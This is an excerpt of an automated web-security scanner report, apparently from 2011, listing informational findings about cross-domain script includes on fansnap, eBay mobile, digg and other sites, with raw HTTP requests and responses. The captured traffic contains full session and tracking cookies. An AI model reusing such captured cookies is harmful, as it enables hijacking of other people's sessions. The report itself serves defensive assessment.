P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

21.7. http://bing.fansnap.com/checkout/index/418563179 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

21.8. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787
http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3
http://ecn.dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js

Request

Response

21.9. http://cc.bingj.com/cache.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cc.bingj.com
Path:	/cache.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.google.com/jsapi

Request

Response

21.10. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.11. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js

Request

Response

21.12. http://feeds.feedburner.com/netsparker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/netsparker

Issue detail

The response dynamically includes the following script from another domain:

http://feedburner.google.com/fb/feed-styles/bf30.js

Request

Response

21.13. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js

Request

Response

21.14. http://investor.realnetworks.com/stockquote.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.realnetworks.com
Path:	/stockquote.cfm

Issue detail

The response dynamically includes the following script from another domain:

http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000RNWK&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=e0e0e0|A33=e0e0e0-ht=240-wd=540-FT:0=6-AP:9=2|10=2-FB:1=E6E6E6-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=336699-FF:1=336699-FL:18=336699-FF:18=336699-FL:5=000000-FF:5=000000-AT:9=1-FI:-IMAP=1

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 20:27:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A27%3A35%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_PREVIEW=;expires=Mon, 19-Jul-2010 20:27:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 27544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
</script>
<script type="text/javascript" src="http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000RNWK&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=e0e0e0|A33=e0e0e0-ht=240-wd=540-FT:0=6-AP:9=2|10=2-FB:1=E6E6E6-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=336699-FF:1=336699-FL:18=336699-FF:18=336699-FL:5=000000-FF:5=000000-AT:9=1-FI:-IMAP=1"></script>
...[SNIP]...

21.15. http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.myspacecdn.com
Path:	/modules/common/static/js/jquery/msglobal_yu2qtsmq.js

Issue detail

The response dynamically includes the following script from another domain:

http://www.myspace.com/music/buttons/js

Request

GET /modules/common/static/js/jquery/msglobal_yu2qtsmq.js HTTP/1.1
Host: js.myspacecdn.com
Proxy-Connection: keep-alive
Referer: http://www.myspace.com/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 14 Jul 2011 17:57:26 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 345475
Cache-Control: max-age=864000
Expires: Fri, 29 Jul 2011 14:28:28 GMT
Date: Tue, 19 Jul 2011 14:28:28 GMT
Connection: close
Access-Control-Allow-Origin: *

(function(a){if(a[a.length-1]==="."){return}var c=a.split(".");var b=c.length;if(b>=2){document.domain=c[b-2]+"."+c[b-1]}})(document.domain);if(!window.onerror){try{window.onerror=function(){return !M
...[SNIP]...
</a><script defer="true" src="http://www.myspace.com/music/buttons/js"></script>
...[SNIP]...

21.16. http://majornelson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://majornelson.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js?ver=3.1.2
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2
X-Pingback: http://majornelson.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 74962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<link rel='canonical' href='http://majornelson.com/' />

   <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js?ver=3.1.2'></script>
   <script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js"></script>
...[SNIP]...
</h4>
   <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

21.17. http://mobile.ebay.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobile.ebay.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js
http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js
http://include.ebaystatic.com/js/v/us/roverlv.js
http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js
http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js

Request

GET / HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c4e25dd01^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://mobile.ebay.com/xmlrpc.php
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>

<
...[SNIP]...
<link rel="stylesheet" href="http://mobile.ebay.com/wp-content/themes/platformpro/style-default.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://include.ebaystatic.com/js/v/us/roverlv.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/v4css/z/mp/qc5wb4ge2e2trcmywgztp4gkd.css"><script src="http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js"></script><script type="text/javascript" src="http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js"></script>
...[SNIP]...
</div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script>
...[SNIP]...

21.18. http://mobile.ebay.com/mobileweb/ebay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobile.ebay.com
Path:	/mobileweb/ebay

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js
http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js
http://include.ebaystatic.com/js/v/us/roverlv.js
http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js
http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js

Request

GET /mobileweb/ebay HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d0^cguid/3666b2e01300a47a44d622a6ffc19372500702d0^trm/svid%3D94316858148500702d0^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5Epsi%3DAsWCSaCg*%5E; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://mobile.ebay.com/xmlrpc.php
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<m
...[SNIP]...
<link rel="stylesheet" href="http://mobile.ebay.com/wp-content/themes/platformpro/style-default.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://include.ebaystatic.com/js/v/us/roverlv.js"></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/v4css/z/mp/qc5wb4ge2e2trcmywgztp4gkd.css"><script src="http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js"></script><script type="text/javascript" src="http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js"></script>
...[SNIP]...
</div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script>
...[SNIP]...

21.19. http://mobileweb.ebay.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobileweb.ebay.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://include.ebaystatic.com/eboxapps/ebaymobi/js/en_US/E711/SYS-MOBI_bsfSysJs_E71113361580_1_en_US.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4ndvwpfiuf%3F%3Cw%7B%28tbgfgi35%3E-13143b29c30
Cache-Control: must-revalidate, no-store, no-transform
Set-Cookie: nbuuid=e86aa901c303413980596abf8e04d882; expires=Tue, 12 Jul 2011 08:50:11 GMT; path=/; domain=.mobileweb.ebay.com
Content-Type: text/html;charset=utf-8
Content-Length: 26822
Date: Tue, 19 Jul 2011 18:40:03 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/eboxapps/ebaymobi/css/en_US/E711/SYS-MOBI_styleWebKitCss_E71113361611_en_US.css"><script src="http://include.ebaystatic.com/eboxapps/ebaymobi/js/en_US/E711/SYS-MOBI_bsfSysJs_E71113361580_1_en_US.js" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5645623.4;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000808880/mnum=0001040486/cstr=14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,1_/xsxdata=$XSXDATA/bnum=14768994/optn=64?trg=;ord=8285755238?

Request

Response

21.21. http://realnetworks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/

